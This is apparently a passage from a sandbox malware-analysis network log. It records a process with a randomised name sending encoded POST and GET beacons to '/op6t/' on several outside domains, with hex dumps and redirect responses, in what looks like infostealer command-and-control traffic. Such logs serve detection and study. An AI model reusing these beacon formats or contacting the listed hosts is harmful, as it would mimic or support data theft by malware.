                                                                        May 22, 2024 17:35:10.120994091 CEST495OUTGET /op6t/?nvddg=1X53ctdebY/A2eDtJqzL446hhD1I+nvyO5ulDREEvqgJJ1wskdyJ8sishyyYv1KZ95Yv7APwNDtcqTXRSGEguqmEKyboxWEzcfGHGWjx7gGV1XFCOYCNEPY=&x2=wN2xY HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.century21morenoycia.mx
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:35:10.409082890 CEST1032INHTTP/1.1 301 Moved Permanently
                                                                        Content-Length: 0
                                                                        Location: https://www.century21morenoycia.mx/op6t?nvddg=1X53ctdebY%2FA2eDtJqzL446hhD1I+nvyO5ulDREEvqgJJ1wskdyJ8sishyyYv1KZ95Yv7APwNDtcqTXRSGEguqmEKyboxWEzcfGHGWjx7gGV1XFCOYCNEPY%3D&x2=wN2xY
                                                                        Strict-Transport-Security: max-age=86400
                                                                        X-Wix-Request-Id: 1716392110.2582149888080321981
                                                                        Cache-Control: public,max-age=0,must-revalidate
                                                                        Server: Pepyaka
                                                                        X-Content-Type-Options: nosniff
                                                                        Accept-Ranges: bytes
                                                                        Age: 188
                                                                        Date: Wed, 22 May 2024 15:35:10 GMT
                                                                        X-Served-By: cache-bfi-krnt7300031-BFI
                                                                        X-Cache: MISS
                                                                        Server-Timing: cache;desc=hit, varnish;desc=hit_miss, dc;desc=fastly_42_g
                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLlAwLb1tXR23DYhcoMEdpYDu/2EjeiyKjB/JVOb8T5Ve,2d58ifebGbosy5xc+FRalrhpWypQjkN0c9Yyjq8PhwED/fYRQ4IOHT7hzVeDA+M0Am013clB2g4ltmDwjNX+2Q==,2UNV7KOq4oGjA5+PKsX47Dble4mX84gMvMh/QnMYdHsfbJaKSXYQ/lskq2jK6SGP
                                                                        Via: 1.1 google
                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        42192.168.11.304983834.174.122.2807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:35:32.118311882 CEST780OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.facesofhoustontx.com
                                                                        Origin: http://www.facesofhoustontx.com
                                                                        Referer: http://www.facesofhoustontx.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 4d 46 67 67 54 37 34 52 63 67 47 46 42 62 74 50 39 50 75 42 75 48 74 4c 4f 79 4d 63 32 77 43 57 69 4e 65 4e 57 71 4c 52 6f 59 7a 63 6e 61 73 52 58 70 45 6b 75 5a 69 6d 65 68 6e 53 2f 72 4c 37 38 47 6a 70 72 64 47 30 32 6e 44 55 6c 36 63 37 51 65 63 61 71 4a 71 51 6f 36 34 59 54 79 51 49 55 55 78 54 5a 41 47 42 70 6d 56 42 71 61 32 73 4d 50 36 59 6a 6a 37 76 6e 7a 75 57 71 69 46 49 61 70 31 4e 69 68 62 7a 76 59 74 63 34 77 2b 43 31 46 2b 34 6a 55 6b 37 55 44 55 64 77 51 50 44 39 61 35 61 4a 76 31 71 73 50 4b 74 47 65 66 34 61 6a 4a 47 39 63 32 31 71 55 45 66 79 2b 78 63 30 41 3d 3d
                                                                        Data Ascii: nvddg=MFggT74RcgGFBbtP9PuBuHtLOyMc2wCWiNeNWqLRoYzcnasRXpEkuZimehnS/rL78GjprdG02nDUl6c7QecaqJqQo64YTyQIUUxTZAGBpmVBqa2sMP6Yjj7vnzuWqiFIap1NihbzvYtc4w+C1F+4jUk7UDUdwQPD9a5aJv1qsPKtGef4ajJG9c21qUEfy+xc0A==


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        43192.168.11.304983934.174.122.2807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:35:34.866075993 CEST800OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.facesofhoustontx.com
                                                                        Origin: http://www.facesofhoustontx.com
                                                                        Referer: http://www.facesofhoustontx.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 4d 46 67 67 54 37 34 52 63 67 47 46 42 36 64 50 79 4d 47 42 6f 6e 74 4d 41 53 4d 63 74 41 44 2b 69 4e 69 4e 57 72 4f 4f 70 75 6a 63 6d 37 63 52 46 63 6f 6b 74 5a 69 6d 4d 42 6e 4c 69 62 4c 47 38 47 76 62 72 63 36 30 32 6e 58 55 6c 37 73 37 54 70 77 46 72 5a 71 57 69 71 34 61 63 53 51 49 55 55 78 54 5a 41 69 6e 70 6d 64 42 74 71 47 73 4e 74 53 62 39 54 37 73 6b 7a 75 57 68 43 46 55 61 70 30 59 69 67 33 5a 76 64 78 63 34 77 75 43 31 55 2b 37 77 30 6b 39 4b 7a 56 72 31 69 36 54 31 65 5a 59 48 34 5a 47 6b 4f 54 56 4b 70 75 69 48 67 39 45 75 38 4b 59 32 56 70 33 77 38 77 48 70 45 41 6d 4d 70 6a 61 46 4e 48 4d 50 5a 54 59 4b 68 73 6d 35 4a 6f 3d
                                                                        Data Ascii: nvddg=MFggT74RcgGFB6dPyMGBontMASMctAD+iNiNWrOOpujcm7cRFcoktZimMBnLibLG8Gvbrc602nXUl7s7TpwFrZqWiq4acSQIUUxTZAinpmdBtqGsNtSb9T7skzuWhCFUap0Yig3Zvdxc4wuC1U+7w0k9KzVr1i6T1eZYH4ZGkOTVKpuiHg9Eu8KY2Vp3w8wHpEAmMpjaFNHMPZTYKhsm5Jo=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        44192.168.11.304984034.174.122.2807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:35:37.612730980 CEST1717OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.facesofhoustontx.com
                                                                        Origin: http://www.facesofhoustontx.com
                                                                        Referer: http://www.facesofhoustontx.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 4d 46 67 67 54 37 34 52 63 67 47 46 42 36 64 50 79 4d 47 42 6f 6e 74 4d 41 53 4d 63 74 41 44 2b 69 4e 69 4e 57 72 4f 4f 70 75 72 63 6d 4e 49 52 58 4c 63 6b 73 5a 69 6d 50 42 6e 57 69 62 4c 58 38 46 66 66 72 63 32 6b 32 6b 76 55 6d 5a 6b 37 53 59 77 46 6b 5a 71 57 71 4b 34 5a 54 79 51 64 55 56 42 58 5a 41 79 6e 70 6d 64 42 74 73 71 73 45 66 36 62 2f 54 37 76 6e 7a 75 4b 71 69 46 6f 61 74 68 76 69 67 44 6a 73 70 39 63 34 52 65 43 7a 6d 57 37 7a 55 6b 2f 4c 7a 56 6a 31 69 6e 4a 31 61 34 70 48 34 46 73 6b 4d 7a 56 62 2b 50 56 63 42 39 46 35 65 4f 36 7a 30 38 41 33 50 6b 4c 68 44 5a 62 4d 4b 44 37 47 75 76 36 4b 2b 76 36 51 43 45 52 6b 74 66 2b 36 34 55 78 6f 34 58 6f 6d 31 6a 54 64 34 45 6d 61 69 54 61 4e 47 44 61 59 66 73 63 67 38 4c 30 51 7a 69 6f 58 38 52 37 54 67 51 6b 30 56 4a 6d 35 55 4e 50 55 62 71 72 75 79 75 4e 41 31 63 64 59 70 7a 66 4c 43 64 72 51 38 53 33 69 6a 46 30 56 31 71 6d 61 54 53 70 75 4b 6e 4c 44 48 45 55 48 41 34 47 31 71 56 44 67 5a 55 38 74 2f 39 38 4e 46 4d 72 [TRUNCATED]
                                                                        Data Ascii: nvddg=MFggT74RcgGFB6dPyMGBontMASMctAD+iNiNWrOOpurcmNIRXLcksZimPBnWibLX8Fffrc2k2kvUmZk7SYwFkZqWqK4ZTyQdUVBXZAynpmdBtsqsEf6b/T7vnzuKqiFoathvigDjsp9c4ReCzmW7zUk/LzVj1inJ1a4pH4FskMzVb+PVcB9F5eO6z08A3PkLhDZbMKD7Guv6K+v6QCERktf+64Uxo4Xom1jTd4EmaiTaNGDaYfscg8L0QzioX8R7TgQk0VJm5UNPUbqruyuNA1cdYpzfLCdrQ8S3ijF0V1qmaTSpuKnLDHEUHA4G1qVDgZU8t/98NFMrOqK7nA3yflSHNl6/vLIteJPPkc9im1aBJH80mtyzRICtxK7Dt/u1w8+2TtKvZ6+WPOw6HWmfVXEZZc9o1PI8WXr0NBMqANv5woCjlC/UUd0dUe3+D6hmHiVJct+5ryk4QW4kuwimSj2FPbphcSeuCw91SDEO9q/VIXexP9zB+PylFhsK4mfWAOEwpXEIbJ3A0yQvnOy8N/jMnN08ziILLaRliCVvJBPLLtOzwyMUpValMiUvtIeQMudhrr+hxCkF7gNK/TwfMYRcLz8aSKoWgJVfLTPdXpfp0LL1IbKhAUH93vIG4EKOGah1Ud2sYxfNonJAdm039GZUEZ4XLgIiyPXH2eealC6aXERvJgx1Oxatih89ovf148KxGZvkuIjUPZRtj031fCNzm6A0MftnymtZdc+gGVOlW8ElpyzLfFLIhYqaS8ugDFNOrEbI+mtLZOi/rTls0CcseDXamQfLHrDW1gqwWdLJcupkR1eRm6zbD2K6afphE6u8mw43RGeRtVr8QPmaXowq7mOp5Kysr3i9GPjaGDr5JqjU2rRvPxlX8eVF1XSmlUtEoLakjFCvm0CMmTR2ufaIOkMjlN3my1MbfQtTQj0aZtud4mDyPHXZ7a/EoW87X/yWK+IXuzxomxBDsRGuzJTqtTjF6gUNRj0hJsE7tso8eb [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        45192.168.11.304984134.174.122.2807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:35:40.369095087 CEST493OUTGET /op6t/?x2=wN2xY&nvddg=BHIAQNMULh6XRL1bx9H5u1ZiIAZR91nuzdCSdKuFpLeK/J0eLacPvObCKir816qtvGKK6uKZvELi45NaX+Eep6GNrYofejB/V2VvbUmxnRNQoZSvM+S992o= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.facesofhoustontx.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        46192.168.11.304984247.243.134.243807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:35:54.305818081 CEST753OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.cngdesk.com
                                                                        Origin: http://www.cngdesk.com
                                                                        Referer: http://www.cngdesk.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 4d 33 50 4f 70 31 4e 45 4b 59 68 47 33 78 55 37 66 4d 76 5a 6d 42 70 67 30 38 46 51 36 67 2b 4e 59 6d 68 62 2f 74 37 50 79 39 72 59 4a 2f 48 68 45 6a 79 70 2b 42 35 67 6f 67 7a 66 67 6b 5a 58 47 32 62 79 36 68 72 54 56 65 2f 55 62 69 48 53 6f 62 4f 6c 64 65 6e 66 69 6d 63 47 67 39 6f 34 67 6a 52 46 72 59 59 6a 4b 76 67 74 58 46 53 64 62 47 62 37 78 35 37 64 5a 75 44 6d 50 59 64 73 72 35 6e 4c 32 79 48 43 4f 58 52 74 32 44 67 6e 4e 4e 7a 64 57 64 36 6f 41 45 52 71 6c 35 4b 30 48 30 59 43 31 44 69 65 6a 79 74 6f 2b 71 31 6f 52 39 6c 37 6d 49 6f 43 32 71 66 34 2b 59 64 51 4d 77 3d 3d
                                                                        Data Ascii: nvddg=M3POp1NEKYhG3xU7fMvZmBpg08FQ6g+NYmhb/t7Py9rYJ/HhEjyp+B5gogzfgkZXG2by6hrTVe/UbiHSobOldenfimcGg9o4gjRFrYYjKvgtXFSdbGb7x57dZuDmPYdsr5nL2yHCOXRt2DgnNNzdWd6oAERql5K0H0YC1Diejyto+q1oR9l7mIoC2qf4+YdQMw==
                                                                        May 22, 2024 17:35:54.798067093 CEST354INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:35:54 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.cngdesk.com/op6t/
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        47192.168.11.304984347.243.134.243807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:35:57.219108105 CEST773OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.cngdesk.com
                                                                        Origin: http://www.cngdesk.com
                                                                        Referer: http://www.cngdesk.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 4d 33 50 4f 70 31 4e 45 4b 59 68 47 33 53 63 37 64 74 76 5a 68 68 70 6a 37 63 46 51 31 41 2b 4a 59 6d 64 62 2f 6f 43 55 78 50 50 59 4a 62 50 68 4b 43 79 70 2f 42 35 67 6a 41 79 56 6b 6b 5a 63 47 32 48 51 36 6a 2f 54 56 65 72 55 62 6e 44 53 6f 4d 61 6d 66 4f 6e 64 32 57 63 45 75 64 6f 34 67 6a 52 46 72 59 4e 4f 4b 75 49 74 58 31 4f 64 4a 6b 2f 38 37 5a 37 63 65 75 44 6d 4c 59 64 6f 72 35 6e 6c 32 7a 61 6c 4f 56 70 74 32 42 6f 6e 4f 5a 6e 65 59 64 36 71 45 45 51 70 6d 72 6a 4e 50 31 34 66 30 7a 79 34 73 41 70 44 32 64 45 79 4d 2b 52 35 31 6f 55 76 71 72 79 51 38 61 63 4c 52 38 53 44 57 79 37 67 68 50 2b 76 42 4c 33 6c 6c 6a 4a 32 42 76 6f 3d
                                                                        Data Ascii: nvddg=M3POp1NEKYhG3Sc7dtvZhhpj7cFQ1A+JYmdb/oCUxPPYJbPhKCyp/B5gjAyVkkZcG2HQ6j/TVerUbnDSoMamfOnd2WcEudo4gjRFrYNOKuItX1OdJk/87Z7ceuDmLYdor5nl2zalOVpt2BonOZneYd6qEEQpmrjNP14f0zy4sApD2dEyM+R51oUvqryQ8acLR8SDWy7ghP+vBL3lljJ2Bvo=
                                                                        May 22, 2024 17:35:57.606918097 CEST354INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:35:57 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.cngdesk.com/op6t/
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        48192.168.11.304984447.243.134.243807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:36:00.218278885 CEST1690OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.cngdesk.com
                                                                        Origin: http://www.cngdesk.com
                                                                        Referer: http://www.cngdesk.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 4d 33 50 4f 70 31 4e 45 4b 59 68 47 33 53 63 37 64 74 76 5a 68 68 70 6a 37 63 46 51 31 41 2b 4a 59 6d 64 62 2f 6f 43 55 78 50 48 59 4a 70 58 68 46 42 71 70 38 42 35 67 67 41 79 55 6b 6b 5a 42 47 32 50 55 36 6a 79 6f 56 63 54 55 5a 42 2f 53 2f 70 6d 6d 57 4f 6e 64 70 47 63 42 67 39 70 67 67 6a 42 42 72 59 64 4f 4b 75 49 74 58 33 36 64 66 47 62 38 39 5a 37 64 5a 75 44 36 50 59 64 51 72 34 50 54 32 7a 76 53 4f 45 4a 74 32 68 34 6e 4d 71 66 65 55 64 36 73 44 45 51 4c 6d 72 2f 73 50 31 6b 31 30 7a 47 47 73 48 6c 44 79 4a 74 47 5a 50 64 32 68 62 67 4e 33 5a 36 4f 34 61 77 41 50 62 4c 76 63 43 2f 64 6e 65 57 39 47 4e 6a 4c 35 53 68 4f 41 76 65 7a 54 76 63 53 65 6d 6f 51 4b 43 36 72 62 44 71 38 47 38 56 61 55 55 37 6c 77 76 6c 56 64 4b 74 35 42 62 36 46 42 33 50 6b 7a 6a 5a 59 42 33 59 6b 59 58 78 69 37 41 75 6c 48 72 54 6f 39 76 2f 39 43 51 5a 74 50 69 6d 4c 36 57 54 50 6a 66 59 6f 4f 52 4a 35 73 69 4e 4d 6b 47 65 43 31 4f 49 2f 4a 39 42 4f 70 43 62 73 62 6e 37 68 79 43 59 2f 73 4b 5a 30 [TRUNCATED]
                                                                        Data Ascii: nvddg=M3POp1NEKYhG3Sc7dtvZhhpj7cFQ1A+JYmdb/oCUxPHYJpXhFBqp8B5ggAyUkkZBG2PU6jyoVcTUZB/S/pmmWOndpGcBg9pggjBBrYdOKuItX36dfGb89Z7dZuD6PYdQr4PT2zvSOEJt2h4nMqfeUd6sDEQLmr/sP1k10zGGsHlDyJtGZPd2hbgN3Z6O4awAPbLvcC/dneW9GNjL5ShOAvezTvcSemoQKC6rbDq8G8VaUU7lwvlVdKt5Bb6FB3PkzjZYB3YkYXxi7AulHrTo9v/9CQZtPimL6WTPjfYoORJ5siNMkGeC1OI/J9BOpCbsbn7hyCY/sKZ0SRO1t9Xxl96CYvvaCkEvMypKy4S5BnL0bLfg8Bl/SglY4YLQwQg+u/rDqGxAYd9yGFeditJ+8JZVbL3bwSNskfx1/x1QHbzGa0qSjKMzklYYhdf9BDj6EX8snlYelzCIE/kNu3ze1RHNaT+IhSLckqD6OwwclPSACyvoZjXZXdkbPy68rx+Q6cG/TDR8/gRj5ZU3ufewX0+6zfF00/VvX/B/873ZreuJ/Ys4rph0WKrupkPJI8+SBYsFdizjVSEZ9NatkFjW/hekJjPrfB3S550UMrM3KaAQm1jNKOiyYgfy0qFEc0lCu/eSbwtd7lnLH6S3/aKTAyb3acRTI3gNQkxqaPNf13lTcFRy0IvEO93OE1AW/BgO/UGFKi/pI1y09T8aJcHFrFCzKK5NPoEPm3+DlhTIFUbCoiZ6NrFfHHQMcpWv44FHaompwnBkwZHFwcCyoJCYq21u5QbgcnAmE1NJu3VYusZHiBkcCyL6lXROkwZQwWBYgp9x9dAlaWN6k2fBWM1WhfaY1zV64sZOaAsgzMhvAyvOxyAP6euIhq2fBKBe6vbKLsEU+S4LjnaISKMJsZfeUiRB6g6WA19CkmfPLKGz7EOFW50KpIBq1WMESFMzDiu+wZlAORVYHHy9tyeoNkHr2QF5JBeme3UBo/KEYsfWKNR2Bd [TRUNCATED]
                                                                        May 22, 2024 17:36:00.686383009 CEST354INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:36:00 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.cngdesk.com/op6t/
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        49192.168.11.304984547.243.134.243807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:36:03.208013058 CEST484OUTGET /op6t/?x2=wN2xY&nvddg=B1nuqD59UoVahAAaaPrLlCdA9edg7gWIZ1BY+KXGwtiEVaDOMCSD80sEnTK1l1I1d32+6CzQNcHoayq10cGYYZnPmWF+i7E8hCdylepAFYAEUUK5dUTY9b4= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.cngdesk.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:36:03.637356043 CEST490INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:36:03 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.cngdesk.com/op6t/?x2=wN2xY&nvddg=B1nuqD59UoVahAAaaPrLlCdA9edg7gWIZ1BY+KXGwtiEVaDOMCSD80sEnTK1l1I1d32+6CzQNcHoayq10cGYYZnPmWF+i7E8hCdylepAFYAEUUK5dUTY9b4=
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        50192.168.11.3049846203.161.49.193807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
